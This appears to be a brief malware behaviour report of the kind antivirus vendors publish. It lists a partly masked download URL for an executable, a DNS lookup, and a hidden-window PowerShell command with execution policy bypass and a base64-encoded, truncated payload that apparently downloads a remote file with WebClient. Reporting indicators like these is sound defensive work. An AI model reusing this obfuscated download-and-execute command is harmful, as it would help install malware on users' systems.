Technical Information
- http://ke###n.com.mx/vendors/davido.exe
- DNS ASK ke###n.com.mx
- '<SYSTEM32>\cmd.exe' "/c poWERshEll.eXE -eX byPAss -nop -w HIdDEN -Ec IABzAEUAVAAtAEMATwBuAFQAZQBuAHQAIAAtAFYAQQBsAHUAZQAgACgAbgBFAFcALQBPAEIASgBlAEMAdAAgAHMAWQBTAFQAZQBNAC4AbgBFAHQALgBXAEUAQgBDAEwAaQBFAG4AdAApAC4...' (with hidden window)